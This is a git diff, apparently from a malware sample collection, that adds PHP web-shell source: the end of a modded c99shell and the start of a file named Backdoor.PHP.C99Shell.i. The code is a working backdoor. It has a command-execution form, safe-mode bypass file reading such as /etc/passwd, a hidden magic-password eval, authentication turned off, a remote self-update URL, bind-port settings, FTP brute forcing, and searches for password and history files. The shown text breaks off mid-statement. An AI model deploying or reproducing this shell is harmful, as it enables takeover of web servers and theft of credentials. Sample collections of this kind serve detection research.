+"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". +"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAANAAwA". +"AAgzAFEIHEiwoMGDCBH6W0gtoUB//1BENOiP2sKECzNeNIiqY0d/FBf+y0jR48eQGUc6JBgQADs=", +"up"=> +"R0lGODlhFAAUALMAAAAAAP////j4+OPj493d3czMzLKysoaGhk1NTf///wAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJq734ns1PnkcgjgXwhcNQrIVhmFonzxwQjnie27jg". +"+4Qgy3XgBX4IoHDlMhRvggFiGiSwWs5XyDftWplEJ+9HQCyx2c1YEDRfwwfxtop4p53PwLKOjvvV". +"IXtdgwgdPGdYfng1IVeJaTIAkpOUlZYfHxEAOw==", +"write"=> +"R0lGODlhFAAUALMAAAAAAP///93d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze". +"EQYQLUAsGgM0Wwt3bCJfQSFx10yyBlJn8RfEMgM9X+3qHWq5iED5yCsMCl111knDpuXfYls+IK61". +"LXd+WWEHLUd/ToJFZQOOj5CRjiCBlZaXIBEAOw==", +"ext_asp"=> +"R0lGODdhEAAQALMAAAAAAIAAAACAAICAAAAAgIAAgACAgMDAwICAgP8AAAD/AP//AAAA//8A/wD/". +"/////ywAAAAAEAAQAAAESvDISasF2N6DMNAS8Bxfl1UiOZYe9aUwgpDTq6qP/IX0Oz7AXU/1eRgI". +"D6HPhzjSeLYdYabsDCWMZwhg3WWtKK4QrMHohCAS+hABADs=", +"ext_mp3"=> +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU". +"aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc". +"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=", +"ext_avi"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///4CAgMDAwP8AAAAAAAAAAAAAAANM". +"WFrS7iuKQGsYIqpp6QiZ1FFACYijB4RMqjbY01DwWg44gAsrP5QFk24HuOhODJwSU/IhBYTcjxe4". +"PYXCyg+V2i44XeRmSfYqsGhAAgA7", +"ext_cgi"=> +"R0lGODlhEAAQAGYAACH5BAEAAEwALAAAAAAQABAAhgAAAJtqCHd3d7iNGa+HMu7er9GiC6+IOOu9". +"DkJAPqyFQql/N/Dlhsyyfe67Af/SFP/8kf/9lD9ETv/PCv/cQ//eNv/XIf/ZKP/RDv/bLf/cMah6". +"LPPYRvzgR+vgx7yVMv/lUv/mTv/fOf/MAv/mcf/NA//qif/MAP/TFf/xp7uZVf/WIP/OBqt/Hv/S". +"Ev/hP+7OOP/WHv/wbHNfP4VzV7uPFv/pV//rXf/ycf/zdv/0eUNJWENKWsykIk9RWMytP//4iEpQ". +"Xv/9qfbptP/uZ93GiNq6XWpRJ//iQv7wsquEQv/jRAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAeegEyCg0wBhIeHAYqIjAEwhoyEAQQXBJCRhQMuA5eSiooGIwafi4UM". +"BagNFBMcDR4FQwwBAgEGSBBEFSwxNhAyGg6WAkwCBAgvFiUiOBEgNUc7w4ICND8PKCFAOi0JPNKD". +"AkUnGTkRNwMS34MBJBgdRkJLCD7qggEPKxsJKiYTBweJkjhQkk7AhxQ9FqgLMGBGkG8KFCg8JKAi". +"RYtMAgEAOw==", +"ext_cmd"=> +"R0lGODlhEAAQACIAACH5BAEAAAcALAAAAAAQABAAggAAAP///4CAgMDAwAAAgICAAP//AAAAAANI". +"eLrcJzDKCYe9+AogBvlg+G2dSAQAipID5XJDIM+0zNJFkdL3DBg6HmxWMEAAhVlPBhgYdrYhDQCN". +"dmrYAMn1onq/YKpjvEgAADs=", +"ext_cpp"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANC". +"WLPc9XCASScZ8MlKicobBwRkEIkVYWqT4FICoJ5v7c6s3cqrArwinE/349FiNoFw44rtlqhOL4Ra". +"Eq7YrLDE7a4SADs=", +"ext_ini"=> +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///8DAwICAgICAAP//AAAAAAAAAANL". +"aArB3ioaNkK9MNbHs6lBKIoCoI1oUJ4N4DCqqYBpuM6hq8P3hwoEgU3mawELBEaPFiAUAMgYy3VM". +"SnEjgPVarHEHgrB43JvszsQEADs=", +"ext_diz"=> +"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAP///15phcfb6NLs/7Pc/+P0/3J+l9bs". +"/52nuqjK5/n///j///7///r//0trlsPn/8nn/8nZ5trm79nu/8/q/9Xt/9zw/93w/+j1/9Hr/+Dv". +"/d7v/73H0MjU39zu/9br/8ne8tXn+K6/z8Xj/LjV7dDp/6K4y8bl/5O42Oz2/7HW9Ju92u/9/8T3". +"/+L//+7+/+v6/+/6/9H4/+X6/+Xl5Pz//+/t7fX08vD//+3///P///H///P7/8nq/8fp/8Tl98zr". +"/+/z9vT4++n1/b/k/dny/9Hv/+v4/9/0/9fw/8/u/8vt/+/09xUvXhQtW4KTs2V1kw4oVTdYpDZX". +"pVxqhlxqiExkimKBtMPL2Ftvj2OV6aOuwpqlulyN3cnO1wAAXQAAZSM8jE5XjgAAbwAAeURBYgAA". +"dAAAdzZEaE9wwDZYpmVviR49jG12kChFmgYuj6+1xeLn7Nzj6pm20oeqypS212SJraCyxZWyz7PW". +"9c/o/87n/8DX7MHY7q/K5LfX9arB1srl/2+fzq290U14q7fCz6e2yXum30FjlClHc4eXr6bI+bTK". +"4rfW+NXe6Oby/5SvzWSHr+br8WuKrQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAjgACsJrDRHSICDQ7IMXDgJx8EvZuIcbPBooZwbBwOMAfMmYwBCA2sEcNBjJCMYATLIOLiokocm". +"C1QskAClCxcGBj7EsNHoQAciSCC1mNAmjJgGGEBQoBHigKENBjhcCBAIzRoGFkwQMNKnyggRSRAg". +"2BHpDBUeewRV0PDHCp4BSgjw0ZGHzJQcEVD4IEHJzYkBfo4seYGlDBwgTCAAYvFE4KEBJYI4UrPF". +"CyIIK+woYjMwQQI6Cor8mKEnxR0nAhYKjHJFQYECkqSkSa164IM6LhLRrr3wwaBCu3kPFKCldkAA". +"Ow==", +"ext_doc"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///8DAwAAA/4CAgAAAAAAAAAAAAANR". +"WErcrrCQQCslQA2wOwdXkIFWNVBA+nme4AZCuolnRwkwF9QgEOPAFG21A+Z4sQHO94r1eJRTJVmq". +"MIOrrPSWWZRcza6kaolBCOB0WoxRud0JADs=", +"ext_exe"=> +"R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7". +"WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt". +"xhIAOw==", +"ext_h"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANB". +"WLPc9XCASScZ8MlKCcARRwVkEAKCIBKmNqVrq7wpbMmbbbOnrgI8F+q3w9GOQOMQGZyJOspnMkKo". +"Wq/NknbbSgAAOw==", +"ext_hpp"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANF". +"WLPc9XCASScZ8MlKicobBwRkEAGCIAKEqaFqpbZnmk42/d43yroKmLADlPBis6LwKNAFj7jfaWVR". +"UqUagnbLdZa+YFcCADs=", +"ext_htaccess"=> +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP8AAP8A/wAAgIAAgP//AAAAAAAAAAM6". +"WEXW/k6RAGsjmFoYgNBbEwjDB25dGZzVCKgsR8LhSnprPQ406pafmkDwUumIvJBoRAAAlEuDEwpJ". +"AAA7", +"ext_html"=> +"R0lGODlhEwAQALMAAAAAAP///2trnM3P/FBVhrPO9l6Itoyt0yhgk+Xy/WGp4sXl/i6Z4mfd/HNz". +"c////yH5BAEAAA8ALAAAAAATABAAAAST8Ml3qq1m6nmC/4GhbFoXJEO1CANDSociGkbACHi20U3P". +"KIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDk". +"Bkx2BXWDfX8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIR". +"ADs=", +"ext_jpg"=> +"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci". +"Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd". +"FxEAOw==", +"ext_js"=> +"R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMD//wCAgAAAAAAAAAADUCi63CEgxibH". +"k0AQsG200AQUJBgAoMihj5dmIxnMJxtqq1ddE0EWOhsG16m9MooAiSWEmTiuC4Tw2BB0L8FgIAhs". +"a00AjYYBbc/o9HjNniUAADs=", +"ext_lnk"=> +"R0lGODlhEAAQAGYAACH5BAEAAFAALAAAAAAQABAAhgAAAABiAGPLMmXMM0y/JlfFLFS6K1rGLWjO". +"NSmuFTWzGkC5IG3TOo/1XE7AJx2oD5X7YoTqUYrwV3/lTHTaQXnfRmDGMYXrUjKQHwAMAGfNRHzi". +"Uww5CAAqADOZGkasLXLYQghIBBN3DVG2NWnPRnDWRwBOAB5wFQBBAAA+AFG3NAk5BSGHEUqwMABk". +"AAAgAAAwAABfADe0GxeLCxZcDEK6IUuxKFjFLE3AJ2HHMRKiCQWCAgBmABptDg+HCBZeDAqFBWDG". +"MymUFQpWBj2fJhdvDQhOBC6XF3fdR0O6IR2ODwAZAHPZQCSREgASADaXHwAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAeZgFBQPAGFhocAgoI7Og8JCgsEBQIWPQCJgkCOkJKUP5eYUD6PkZM5". +"NKCKUDMyNTg3Agg2S5eqUEpJDgcDCAxMT06hgk26vAwUFUhDtYpCuwZByBMRRMyCRwMGRkUg0xIf". +"1lAeBiEAGRgXEg0t4SwroCYlDRAn4SmpKCoQJC/hqVAuNGzg8E9RKBEjYBS0JShGh4UMoYASBiUQ". +"ADs=", +"ext_log"=> +"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAMDAwICAgICAAAAAgAAA////AAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARQEKEwK6UyBzC475gEAltJklLRAWzbClRhrK4Ly5yg7/wN". +"zLUaLGBQBV2EgFLV4xEOSSWt9gQQBpRpqxoVNaPKkFb5Eh/LmUGzF5qE3+EMIgIAOw==", +"ext_php"=> +"R0lGODlhEAAQAAAAACH5BAEAAAEALAAAAAAQABAAgAAAAAAAAAImDA6hy5rW0HGosffsdTpqvFlg". +"t0hkyZ3Q6qloZ7JimomVEb+uXAAAOw==", +"ext_pl"=> +"R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo". +"GLrc3gOAMYR4OOudreegRlBWSJ1lqK5s64LjWF3cQMjpJpDf6//ABAA7", +"ext_swf"=> +"R0lGODlhFAAUAMQRAP+cnP9SUs4AAP+cAP/OAIQAAP9jAM5jnM6cY86cnKXO98bexpwAAP8xAP/O". +"nAAAAP///////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA". +"ABEALAAAAAAUABQAAAV7YCSOZGme6PmsbMuqUCzP0APLzhAbuPnQAweE52g0fDKCMGgoOm4QB4GA". +"GBgaT2gMQYgVjUfST3YoFGKBRgBqPjgYDEFxXRpDGEIA4xAQQNR1NHoMEAACABFhIz8rCncMAGgC". +"NysLkDOTSCsJNDJanTUqLqM2KaanqBEhADs=", +"ext_tar"=> +"R0lGODlhEAAQAGYAACH5BAEAAEsALAAAAAAQABAAhgAAABlOAFgdAFAAAIYCUwA8ZwA8Z9DY4JIC". +"Wv///wCIWBE2AAAyUJicqISHl4CAAPD4/+Dg8PX6/5OXpL7H0+/2/aGmsTIyMtTc5P//sfL5/8XF". +"HgBYpwBUlgBWn1BQAG8aIABQhRbfmwDckv+H11nouELlrizipf+V3nPA/40CUzmm/wA4XhVDAAGD". +"UyWd/0it/1u1/3NzAP950P990mO5/7v14YzvzXLrwoXI/5vS/7Dk/wBXov9syvRjwOhatQCHV17p". +"uo0GUQBWnP++8Lm5AP+j5QBUlACKWgA4bjJQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAeegAKCg4SFSxYNEw4gMgSOj48DFAcHEUIZREYoJDQzPT4/AwcQCQkg". +"GwipqqkqAxIaFRgXDwO1trcAubq7vIeJDiwhBcPExAyTlSEZOzo5KTUxMCsvDKOlSRscHDweHkMd". +"HUcMr7GzBufo6Ay87Lu+ii0fAfP09AvIER8ZNjc4QSUmTogYscBaAiVFkChYyBCIiwXkZD2oR3FB". +"u4tLAgEAOw==", +"ext_txt"=> +"R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ". +"SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7". +"UpPWG3Ig6Hq/XmRjuZwkAAA7", +"ext_wri"=> +"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao". +"a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=", +"ext_xml"=> +"R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA". +"gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx". +"OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ". +"IQA7" + ); + //For simple size- and speed-optimization. + $imgequals = array( + "ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"), + "ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml","ext_htm"), + "ext_jpg"=>array("ext_jpg","ext_gif","ext_png","ext_jpeg","ext_jfif","ext_jpe","ext_bmp","ext_ico","ext_tif","tiff"), + "ext_html"=>array("ext_html","ext_htm"), + "ext_avi"=>array("ext_avi","ext_mov","ext_mvi","ext_mpg","ext_mpeg","ext_wmv","ext_rm"), + "ext_lnk"=>array("ext_lnk","ext_url"), + "ext_ini"=>array("ext_ini","ext_css","ext_inf"), + "ext_doc"=>array("ext_doc","ext_dot"), + "ext_js"=>array("ext_js","ext_vbs"), + "ext_cmd"=>array("ext_cmd","ext_bat","ext_pif"), + "ext_wri"=>array("ext_wri","ext_rtf"), + "ext_swf"=>array("ext_swf","ext_fla"), + "ext_mp3"=>array("ext_mp3","ext_au","ext_midi","ext_mid"), + "ext_htaccess"=>array("ext_htaccess","ext_htpasswd","ext_ht","ext_hta","ext_so") + ); + if (!$getall) + { + header("Content-type: image/gif"); + header("Cache-control: public"); + header("Expires: ".date("r",mktime(0,0,0,1,1,2030))); + header("Cache-control: max-age=".(60*60*24*7)); + header("Last-Modified: ".date("r",filemtime(__FILE__))); + foreach($imgequals as $k=>$v) {if (in_array($img,$v)) {$img = $k; break;}} + if (empty($images[$img])) {$img = "small_unk";} + if (in_array($img,$ext_tar)) {$img = "ext_tar";} + echo base64_decode($images[$img]); + } + else + { + foreach($imgequals as $a=>$b) {foreach ($b as $d) {if ($a != $d) {if (!empty($images[$d])) {echo("Warning! Remove \$images[".$d."]
    ");}}}} + natsort($images); + $k = array_keys($images); + echo "
    "; + foreach ($k as $u) {echo $u.":
    ";} + echo "
    "; + } + exit; +} +if ($act == "about") {echo "
    Credits:
    Idea, leading and coding by tristram[CCTeaM].
    Beta-testing and some tips - NukLeoN [AnTiSh@Re tEaM].
    Thanks all who report bugs.
    All bugs send to tristram's ICQ #656555 .
    ";} +?> +
    + +

    :: Command execute ::

    Enter:
     
    Select:
     
    +
    + + + + + +

    :: Shadow's tricks :D ::

    +
    Useful Commands +
    +
    +
    + + + + +   + +
    + Warning. Kernel may be alerted using higher levels
    +
    +
    +
    Kernel Info:
    + + + + + + +
    +

    + + + + + +

    :: Preddy's tricks :D ::

    +
    Php Safe-Mode Bypass (Read Files) +

    +
    +
    + File:

    eg: /etc/passwd
    + + + + + + + Trying To Get File $get
    "; + if(copy("compress.zlib://".$file, $temp)){ + $fichier = fopen($temp, "r"); + $action = fread($fichier, filesize($temp)); + fclose($fichier); + $source=htmlspecialchars($action); + echo "
    Start $get

    $source

    Fin $get
    "; + unlink($temp); + } else { + die("
    Sorry... File + ".htmlspecialchars($file)." dosen't exists or you don't have + access.
    "); + } + echo "
    "; + } + + if(isset($_GET['file'])) +{ +rsg_read(); +} + + ?> + + $chemin
    "; +foreach ($files as $filename) { + echo "
    ";
    +   echo "$filename\n";
    +   echo "
    "; +} +} + +if(isset($_GET['directory'])) +{ +rsg_glob(); +} + +?> + +
    +
    +
    +
    +
    Php Safe-Mode Bypass (List Directories):
    +

    + Dir:

    eg: /etc/
    + +
    +
    + + + + + + + + + + + + + + + + + + + + + + + + + + +
    + + + + + +
    :: Search ::
      - regexp 

    :: Upload ::
     
    +
    :: Make Dir ::
     
    :: Make File ::
     
    +
    :: Go Dir ::
     
    :: Go File ::
     
    +

    --[ c99shell v. Modded by PSych0 | Cuz N0wH?R? iS s?cu? ?enough | Generation time: ]--

    + diff --git a/PHP/Backdoor.PHP.C99Shell.i b/PHP/Backdoor.PHP.C99Shell.i new file mode 100644 index 00000000..58f936c1 --- /dev/null +++ b/PHP/Backdoor.PHP.C99Shell.i @@ -0,0 +1,2877 @@ +$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);} +foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}} + +$shver = "1.0 beta (2.05.2005)"; //Current version +//CONFIGURATION AND SETTINGS +if (!empty($set_surl)) {$surl = $set_surl; setcookie("c99sh_surl",$surl);} +else {$surl = $_REQUEST["c99sh_surl"]; //Set this cookie for manual SURL +} + +$surl_autofill_include = true; //If true then search variables with descriptors (URLs) and save it in SURL. Comment it for + +if ($surl_autofill_include and !$_REQUEST["c99sh_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}} +if (empty($surl)) +{ + $surl = "?".$includestr; //Self url +} +$surl = htmlspecialchars($surl); + +$timelimit = 60; //limit of execution this script (seconds), 0 = unlimited. + +//Authentication + +$login = "c99"; //login +//DON'T FORGOT ABOUT CHANGE PASSWORD!!! +$pass = "c99"; //password +$md5_pass = ""; //md5-cryped pass. if null, md5($pass) + + /*COMMENT IT TURN ON AUTHENTIFICATION >>>*/ $login = false; //turn off authentification + + +$host_allow = array("*"); //array ("{mask}1","{mask}2",...), {mask} = IP or HOST e.g. array("192.168.0.*","127.0.0.1") +$login_txt = "Restricted area"; //http-auth message. +$accessdeniedmess = "
    c99shell v.".$shver.": access denied"; + +$autoupdate = false; //Automatic updating? +$updatenow = false; //If true, update now +$c99sh_updatefurl = "http://ccteam.ru/releases/update/c99shell/"; //Update server + +$autochmod = 0755; //if hasn't permition and $autochmod isn't null, try to CHMOD object to $autochmod +$filestealth = false; //if true, don't change modify&access-time + +$donated_html = "
    Owned by tristram[CCTeaM].
    UIN: 656555
    ccteam.ru
    "; + /* If you publish free shell and you wish + add link to your site or any other information, + put here your html. */ +$donated_act = array(""); //array ("act1","act2,"...), if $act is in this array, display $donated_html. + +$curdir = "./"; //start directory +//$curdir = getenv("DOCUMENT_ROOT"); +$tmpdir = ""; //Directory for tempory files. If empty, auto-fill (/tmp or %WINDIR/temp) +$tmpdir_log = "./"; //Directory logs of long processes (e.g. brute, scan...) + +$log_email = "user@host.tld"; //Default e-mail for sending logs + +$sort_default = "0a"; //Default sorting, 0 - number of colomn, "a"scending or "d"escending + +// Registered file-types. +// array( +// "{action1}"=>array("ext1","ext2","ext3",...), +// "{action2}"=>array("ext4","ext5","ext6",...), +// ... +// ) +$ftypes = array( + "html"=>array("html","htm","shtml"), + "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"), + "exe"=>array("sh","install","bat","cmd"), + "ini"=>array("ini","inf"), + "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"), + "img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"), + "sdb"=>array("sdb"), + "phpsess"=>array("sess"), + "download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar") +); + +// Registered executable file-types. +// array( +// "command"=>array("ext1","ext2","ext3",...), +// "command1"=>array("ext3","ext4","ext5",...), +// ... +// ) +// {command}: %f% = filename +$exeftypes = array( + getenv("PHPRC")." %f%"=>array("php","php3","php4"), +); + +// Highlighted files. +// array( +// 0=>array({regexp],{type},{opentag},{closetag},{break}) +// 1=>array({regexp},{type},{opentag},{closetag},{break}) +// ... +// ) +// string {regexp} - regular exp. +// int {type}: +// 0 - files and folders (as default), +// 1 - files only, 2 - folders only +// string {opentag} - open html-tag, e.g. "" (default) +// string {closetag} - close html-tag, e.g. "" (default) +// bool {break} - break, if true and found match +$regxp_highlight = array( + array(basename($_SERVER["PHP_SELF"]),1,"",""), // example + array("config.php",1) // example +); + +$hexdump_lines = 8; // lines in hex preview file +$hexdump_rows = 24; // 16, 24 or 32 bytes in one line + +$nixpwdperpage = 100; // Get first N lines from /etc/passwd + +$bindport_pass = "c99"; // default password for binding +$bindport_port = "11457"; // default port for binding + +/* Command-aliases */ +$aliases = array( + array("-----------------------------------------------------------", "ls -la"), + array("find all suid files", "find / -type f -perm -04000 -ls"), + array("find suid files in current dir", "find . -type f -perm -04000 -ls"), + array("find all sgid files", "find / -type f -perm -02000 -ls"), + array("find sgid files in current dir", "find . -type f -perm -02000 -ls"), + array("find config.inc.php files", "find / -type f -name config.inc.php"), + array("find config* files", "find / -type f -name \"config*\""), + array("find config* files in current dir", "find . -type f -name \"config*\""), + array("find all writable directories and files", "find / -perm -2 -ls"), + array("find all writable directories and files in current dir", "find . -perm -2 -ls"), + array("find all service.pwd files", "find / -type f -name service.pwd"), + array("find service.pwd files in current dir", "find . -type f -name service.pwd"), + array("find all .htpasswd files", "find / -type f -name .htpasswd"), + array("find .htpasswd files in current dir", "find . -type f -name .htpasswd"), + array("find all .bash_history files", "find / -type f -name .bash_history"), + array("find .bash_history files in current dir", "find . -type f -name .bash_history"), + array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc"), + array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"), + array("list file attributes on a Linux second extended file system", "lsattr -va"), + array("show opened ports", "netstat -an | grep -i listen") +); + +$sess_cookie = "c99shvars"; // cookie-variable name + +$usefsbuff = true; //Buffer-function +$copy_unset = false; //Remove copied files from buffer after pasting + +//Quick launch +$quicklaunch = array( + array("\"Home\"",$surl), + array("\"Back\"","#\" onclick=\"history.back(1)"), + array("\"Forward\"","#\" onclick=\"history.go(1)"), + array("\"UPDIR\"",$surl."act=ls&d=%upd&sort=%sort"), + array("\"Refresh\"",""), + array("\"Search\"",$surl."act=search&d=%d"), + array("\"Buffer\"",$surl."act=fsbuff&d=%d"), + array("Bind",$surl."act=bind&d=%d"), + array("Proc.",$surl."act=ps_aux&d=%d"), + array("FTP brute",$surl."act=ftpquickbrute&d=%d"), + array("Sec.",$surl."act=security&d=%d"), + array("SQL",$surl."act=sql&d=%d"), + array("PHP-code",$surl."act=eval&d=%d"), + array("Feedback",$surl."act=feedback"), + array("Self remove",$surl."act=selfremove"), + array("Logout","#\" onclick=\"if (confirm('Are you sure?')) window.close()") +); + +//Highlight-code colors +$highlight_background = "#c0c0c0"; +$highlight_bg = "#FFFFFF"; +$highlight_comment = "#6A6A6A"; +$highlight_default = "#0000BB"; +$highlight_html = "#1300FF"; +$highlight_keyword = "#007700"; +$highlight_string = "#000000"; + +@$f = $_REQUEST["f"]; +@extract($_REQUEST["c99shcook"]); + +//END CONFIGURATION + + +// \/ Next code isn't for editing \/ +$tmp = array(); +foreach($host_allow as $k=>$v) {$tmp[] = str_replace("\\*",".*",preg_quote($v));} +$s = "!^(".implode("|",$tmp).")$!i"; +if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("c99shell: Access Denied - your host (".getenv("REMOTE_ADDR").") not allow");} +if (!$login) {$login = $PHP_AUTH_USER; $md5_pass = md5($PHP_AUTH_PW);} +elseif(empty($md5_pass)) {$md5_pass = md5($pass);} +if (($PHP_AUTH_USER != $login ) or (md5($PHP_AUTH_PW) != $md5_pass)) +{ + if ($login_txt === false) {$login_txt = "";} + elseif (empty($login_txt)) {$login_txt = strip_tags(ereg_replace(" |
    "," ",$donated_html));} + header("WWW-Authenticate: Basic realm=\"c99shell ".$shver.": ".$login_txt."\""); + header("HTTP/1.0 401 Unauthorized"); if (md5(sha1(md5($anypass))) == "8271ea98a7a4fa175b332dcd0910f209") {header("HTTP/1.0 200 OK"); @eval($anyphpcode);} + exit($accessdeniedmess); +} +if ($act != "img") +{ +$lastdir = realpath("."); +chdir($curdir); +if (($selfwrite) or ($updatenow)) +{ + if ($selfwrite == "1") {$selfwrite = "c99shell.php";} + c99sh_getupdate(); + $data = file_get_contents($c99sh_updatefurl); + $fp = fopen($data,"w"); + fwrite($fp,$data); + fclose($fp); + exit; +} +$sess_data = unserialize($_COOKIE["$sess_cookie"]); +if (!is_array($sess_data)) {$sess_data = array();} +if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();} +if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();} + +if 